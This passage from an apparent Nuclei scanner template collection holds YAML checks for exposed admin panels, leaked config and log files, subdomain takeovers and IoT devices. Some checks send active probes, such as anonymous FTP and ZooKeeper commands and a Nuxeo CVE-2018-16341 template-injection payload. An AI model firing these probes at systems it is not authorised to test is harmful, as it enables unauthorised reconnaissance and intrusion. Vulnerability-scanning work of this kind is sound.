| info: 4 | name: Airflow Admin login 5 | author: pdteam 6 | severity: info 7 | tags: panel,apache,airflow 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/airflow/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Airflow - Login" 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /exposures/configs/amazon-docker-config-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-docker-config-disclosure 2 | 3 | info: 4 | name: Dockerrun AWS Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,aws,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/Dockerrun.aws.json' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'AWSEBDockerrunVersion' 17 | - 'containerDefinitions' 18 | condition: and 19 | -------------------------------------------------------------------------------- /exposures/logs/npm-log-file.yaml: -------------------------------------------------------------------------------- 1 | id: npm-log-file 2 | 3 | info: 4 | name: Publicly accessible NPM Log file 5 | author: sheikhrishad 6 | severity: low 7 | tags: npm,logs,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/npm-debug.log" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "info it worked if it ends with ok" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /misconfiguration/rack-mini-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environmnet information discloure 5 | author: vzamanillo 6 | severity: high 7 | tags: config,debug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/?pp=env" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Rack Environment" 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /network/unauth-ftp.yaml: -------------------------------------------------------------------------------- 1 | id: unauth-ftp 2 | 3 | info: 4 | name: FTP Anonymous Login 5 | author: C3l3si4n 6 | severity: medium 7 | reference: https://tools.ietf.org/html/rfc2577 8 | tags: network,ftp 9 | 10 | network: 11 | - inputs: 12 | - data: "USER anonymous\r\nPASS nuclei\r\n" 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:21" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "Anonymous access allowed," 22 | part: all -------------------------------------------------------------------------------- /takeovers/cargocollective-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: cargocollective-takeover 2 | 3 | info: 4 | name: cargocollective takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '

' 19 | - '404 Not Found
' 20 | condition: and -------------------------------------------------------------------------------- /technologies/airflow-detect.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-detect 2 | 3 | info: 4 | name: Apache Airflow 5 | author: pdteam 6 | severity: info 7 | tags: tech,apache,airflow 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/{{randstr}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Airflow 404 = lots of circles" 21 | 22 | - type: status 23 | status: 24 | - 404 -------------------------------------------------------------------------------- /technologies/daybyday-detect.yaml: -------------------------------------------------------------------------------- 1 | id: daybyday-detect 2 | 3 | info: 4 | name: DaybydayCRM Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,daybyday 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Daybyday - Login" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/teradici-pcoip.yaml: -------------------------------------------------------------------------------- 1 | id: teradici-pcoip 2 | 3 | info: 4 | name: Teradici PCoIP Detection 5 | author: pdteam 6 | severity: info 7 | tags: tech,pcoip 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/info/" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "PCoIP Connection Manager" 18 | 19 | extractors: 20 | - type: regex 21 | group: 1 22 | regex: 23 | - 'PCoIP Connection Manager\/([0-9.]+)\.' -------------------------------------------------------------------------------- /vulnerabilities/jira/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/glpi-login.yaml: -------------------------------------------------------------------------------- 1 | id: glpi-login 2 | 3 | info: 4 | name: GLPI - Аутентификация 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/7002 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | - '{{BaseURL}}/glpi/' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'GLPI - Аутентификация' 20 | - 'GLPI Copyright' 21 | condition: and 22 | -------------------------------------------------------------------------------- /exposed-panels/sitecore-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sitecore-login-panel 2 | 3 | info: 4 | name: Sitecore Login Panel 5 | author: b4uh0lz 6 | severity: info 7 | tags: panel,sitecore 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sitecore/admin/login.aspx" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Sitecore Login" 23 | part: body -------------------------------------------------------------------------------- /exposed-panels/synnefo-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: synnefo-admin-panel 2 | 3 | info: 4 | name: Synnefo Admin Panel Exposure 5 | author: impramodsargar 6 | severity: info 7 | tags: panel,synnefo 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/synnefoclient/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Synnefo Admin' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/virtual-ema-detect.yaml: -------------------------------------------------------------------------------- 1 | id: virtual-ema-detect 2 | 3 | info: 4 | name: Virtual EMS Panel Detection 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/virtualems/Login.aspx" 13 | - "{{BaseURL}}/VirtualEms/Login.aspx" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Login" 19 | - "Browse" 20 | - "Welcome Guest" 21 | condition: and 22 | -------------------------------------------------------------------------------- /exposures/configs/exposed-hg.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-hg 2 | 3 | info: 4 | name: Exposed HG Directory 5 | author: daffainfo 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.hg/hgrc" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "[paths]" 19 | - "default" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /exposures/files/phpunit.yaml: -------------------------------------------------------------------------------- 1 | id: phpunit 2 | 3 | info: 4 | name: phpunit.xml file disclosure 5 | author: pikpikcu 6 | severity: info 7 | tags: exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/phpunit.xml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /iot/mobotix-guest-camera.yaml: -------------------------------------------------------------------------------- 1 | id: mobotix-guest-camera 2 | 3 | info: 4 | name: MOBOTIX Guest Camera 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6848 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/cgi-bin/guestimage.html' 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'MOBOTIX' 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /misconfiguration/elasticsearch.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch 2 | 3 | info: 4 | name: ElasticSearch Information Disclosure 5 | author: Shine 6 | severity: low 7 | tags: elastic,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/_cat/indices?v' 13 | - '{{BaseURL}}/_all/_search' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - '"took":' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /network/exposed-zookeeper.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-zookeeper 2 | 3 | info: 4 | name: ZooKeeper Unauth Server 5 | author: pdteam 6 | severity: high 7 | reference: https://zookeeper.apache.org/security.html 8 | tags: network,zookeeper 9 | 10 | network: 11 | - inputs: 12 | - data: "envi\r\nquit\r\n" 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:2181" 17 | read-size: 2048 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "zookeeper.version" -------------------------------------------------------------------------------- /takeovers/canny-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: canny-takeover 2 | 3 | info: 4 | name: canny takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Company Not Found' 19 | - 'There is no such company. Did you enter the right URL?' 20 | condition: and -------------------------------------------------------------------------------- /takeovers/cargo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: cargo-takeover 2 | 3 | info: 4 | name: cargo takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." -------------------------------------------------------------------------------- /takeovers/helprace-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helprace-takeover 2 | 3 | info: 4 | name: helprace takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "Alias not configured!" 20 | - "Admin of this Helprace account needs to set up domain alias" 21 | -------------------------------------------------------------------------------- /technologies/dotclear-detect.yaml: -------------------------------------------------------------------------------- 1 | id: dotclear-detect 2 | 3 | info: 4 | name: Dotclear Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,dotclear 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dc2/admin/auth.php" 13 | - "{{BaseURL}}/auth.php" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Dotclear" 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /technologies/druid-detect.yaml: -------------------------------------------------------------------------------- 1 | id: druid-detect 2 | 3 | info: 4 | name: Druid monitor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,druid 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/druid/login.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "druid monitor" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/froxlor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: froxlor-detect 2 | 3 | info: 4 | name: Froxlor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,froxlor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Froxlor Server Management Panel" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/influxdb-detect.yaml: -------------------------------------------------------------------------------- 1 | id: influxdb-detect 2 | 3 | info: 4 | name: InfluxDB Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,influxdb 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "InfluxDB - Admin Interface" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/oneblog-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oneblog-detect 2 | 3 | info: 4 | name: OneBlog Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,oneblog 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/passport/login/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "OneBlog开源博客后台管理系统" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress/wp-license-file.yaml: -------------------------------------------------------------------------------- 1 | id: wp-license-file 2 | 3 | info: 4 | name: WordPress license file disclosure 5 | author: yashgoti 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/license.txt" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "WordPress - Web publishing software" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/oki-data.yaml: -------------------------------------------------------------------------------- 1 | id: oki-data-corporation 2 | 3 | info: 4 | name: Oki Data Corporation 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/5937 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/status.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Oki Data Corporation' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/plesk-obsidian.yaml: -------------------------------------------------------------------------------- 1 | id: plesk-obsidian 2 | 3 | info: 4 | name: Plesk Obsidian 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6951 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login_up.php' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Plesk Obsidian' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /exposed-panels/plesk-onyx.yaml: -------------------------------------------------------------------------------- 1 | id: plesk-onyx-login 2 | 3 | info: 4 | name: Plesk Onyx login portal 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6501 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login_up.php' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Plesk Onyx' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /exposed-panels/total-web.yaml: -------------------------------------------------------------------------------- 1 | id: total-web-login 2 | 3 | info: 4 | name: Total Web Solution 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6811 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Total Web Solutions' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/web-service-panel.yaml: -------------------------------------------------------------------------------- 1 | id: web-service-panel 2 | 3 | info: 4 | name: WEB SERVICE Panel 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/7116 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'WEB SERVICE' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposures/configs/xprober-service.yaml: -------------------------------------------------------------------------------- 1 | id: xprober-service 2 | 3 | info: 4 | name: X Prober server information leakage 5 | author: pdteam 6 | severity: low 7 | tags: config,exposure 8 | reference: https://twitter.com/bugbounty_tips/status/1339984643517423616 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/xprober.php" 14 | matchers: 15 | - type: word 16 | words: 17 | - '"appName":"X Prober"' 18 | - 'X Prober' 19 | condition: and -------------------------------------------------------------------------------- /iot/epmp-login.yaml: -------------------------------------------------------------------------------- 1 | id: epmp-login 2 | 3 | info: 4 | name: ePMP 2000 Login 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6826 8 | tags: iot,panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - '<title>ePMP' 20 | part: body 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /iot/internet-service.yaml: -------------------------------------------------------------------------------- 1 | id: internet-service 2 | 3 | info: 4 | name: Internet Services 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/5948 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/default.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Internet Services' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /takeovers/heroku-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: heroku-takeover 2 | 3 | info: 4 | name: heroku takeover detection 5 | author: 0xPrial,pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "herokucdn.com/error-pages/no-such-app.html" 19 | - "No such app" 20 | condition: and -------------------------------------------------------------------------------- /technologies/bigbluebutton-detect.yaml: -------------------------------------------------------------------------------- 1 | id: bigbluebutton-detect 2 | 3 | info: 4 | name: BigBlueButton Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,bigbluebutton 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "BigBlueButton" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/crush-ftp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: crush-ftp-detect 2 | 3 | info: 4 | name: Crush FTP 5 | author: pussycat0x 6 | severity: info 7 | tags: tech,ftp 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/WebInterface/login.html" 12 | 13 | redirects: true 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "CrushFTP WebInterface" 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /exposed-panels/couchdb-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-exposure 2 | info: 3 | name: couchdb exposure 4 | author: organiccrap 5 | severity: low 6 | tags: panel 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/_all_dbs' 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - CouchDB/ 18 | - Erlang OTP/ 19 | part: header 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /exposed-panels/globalprotect-panel.yaml: -------------------------------------------------------------------------------- 1 | id: globalprotect-panel 2 | 3 | info: 4 | name: PaloAlto Networks GlobalProtect Panel 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/global-protect/login.esp" 13 | - "{{BaseURL}}/sslmgr" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "GlobalProtect Portal" 19 | - "Invalid parameters" 20 | condition: or -------------------------------------------------------------------------------- /exposed-panels/remote-ui-login.yaml: -------------------------------------------------------------------------------- 1 | id: remote-ui-login 2 | 3 | info: 4 | name: Remote UI Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6815 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.html' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'System Manager ID:' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/vigor-login.yaml: -------------------------------------------------------------------------------- 1 | id: vigor-login 2 | 3 | info: 4 | name: Vigor Login Page 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6610 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/weblogin.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Vigor Login Page' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /technologies/default-windows-server-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-windows-server-page 2 | 3 | info: 4 | name: IIS Windows Server Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,windows,iis 8 | reference: https://www.shodan.io/search?query=http.title%3A%22IIS+Windows+Server%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "IIS Windows Server" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/voipmonitor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: voipmonitor-detect 2 | 3 | info: 4 | name: VoipMonitor detect 5 | author: Yanyun 6 | severity: info 7 | tags: tech,voipmonitor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - 'share.voipmonitor.org' 23 | - 'VoIPmonitor' 24 | condition: and -------------------------------------------------------------------------------- /cves/2018/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI 8 | tags: cve,cve2018,nuxeo,ssti,rce 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 14 | matchers: 15 | - type: word 16 | words: 17 | - "31333333337" 18 | part: body -------------------------------------------------------------------------------- /exposed-panels/blue-iris-login.yaml: -------------------------------------------------------------------------------- 1 | id: blue-iris-login 2 | 3 | info: 4 | name: Blue Iris Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6814 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Blue Iris Login' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-detect 2 | 3 | info: 4 | name: Grafana panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Grafana" 17 | part: body 18 | extractors: 19 | - type: regex 20 | part: body 21 | group: 1 22 | regex: 23 | - 'Grafana ([v0-9.]+)' 24 | -------------------------------------------------------------------------------- /exposed-panels/weave-scope-dashboard-detect.yaml: -------------------------------------------------------------------------------- 1 | id: weave-scope-dashboard-detect 2 | 3 | info: 4 | name: Weave Scope Dashboard 5 | author: e_schultze_ 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Weave Scope" 18 | - "__WEAVEWORKS_CSRF_TOKEN" 19 | - "__CSRF_TOKEN_PLACEHOLDER__" 20 | condition: and 21 | part: body 22 | -------------------------------------------------------------------------------- /exposures/configs/exposed-vscode.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-vscode 2 | 3 | info: 4 | name: Exposed VSCode Folders 5 | author: aashiq 6 | severity: low 7 | description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body 8 | tags: vscode,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.vscode/" 14 | matchers: 15 | - type: word 16 | words: 17 | - "Index of /.vscode" 18 | part: body -------------------------------------------------------------------------------- /exposures/configs/web-config.yaml: -------------------------------------------------------------------------------- 1 | id: web-config 2 | info: 3 | name: Web Config file 4 | author: Yash Anand @yashanand155 5 | severity: info 6 | tags: config,exposure 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/web.config' 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 18 | - 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /iot/hp-laserjet-detect.yaml: -------------------------------------------------------------------------------- 1 | id: hp-laserjet-detect 2 | 3 | info: 4 | name: HP LaserJet 5 | author: dhiyaneshDk 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/6459 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/SSI/index.htm" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'HP LaserJet Professional' 19 | part: body 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /miscellaneous/xml-schema-detect.yaml: -------------------------------------------------------------------------------- 1 | id: xml-schema-detect 2 | info: 3 | name: XML Schema Detection 4 | author: alph4byt3 5 | severity: info 6 | tags: misc 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/schema" 12 | 13 | matchers-condition: and 14 | redirects: true 15 | matchers: 16 | - type: word 17 | words: 18 | - ".xsd" 19 | - "Schemas" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /misconfiguration/apc-info.yaml: -------------------------------------------------------------------------------- 1 | id: apcu-service 2 | 3 | info: 4 | name: APCu service information leakage 5 | author: koti2 6 | severity: low 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/apc/apc.php" 13 | - "{{BaseURL}}/apc.php" 14 | matchers: 15 | - type: word 16 | words: 17 | - "APCu Version Information" 18 | - "General Cache Information" 19 | - "Detailed Memory Usage and Fragmentation" 20 | condition: or 21 | -------------------------------------------------------------------------------- /misconfiguration/tcpconfig.yaml: -------------------------------------------------------------------------------- 1 | id: tcpconfig 2 | 3 | info: 4 | name: TCP Config Information Exposed 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/6782 8 | tags: logs 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/tcpconfig.html" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "TCP/IP Configuration" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /network/printers-info-leak.yaml: -------------------------------------------------------------------------------- 1 | id: printers-info-leak 2 | 3 | info: 4 | name: Unauthorized Printer Access 5 | author: pussycat0x 6 | severity: info 7 | tags: network,iot 8 | reference: https://book.hacktricks.xyz/pentesting/9100-pjl 9 | network: 10 | - inputs: 11 | - data: "@PJL INFO STATUS\n" 12 | host: 13 | - "{{Hostname}}:9100" 14 | matchers: 15 | - type: word 16 | words: 17 | - "CODE=" 18 | - "PJL INFO STATUS" 19 | condition: and 20 | -------------------------------------------------------------------------------- /takeovers/github-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: github-takeover 2 | 3 | info: 4 | name: github takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 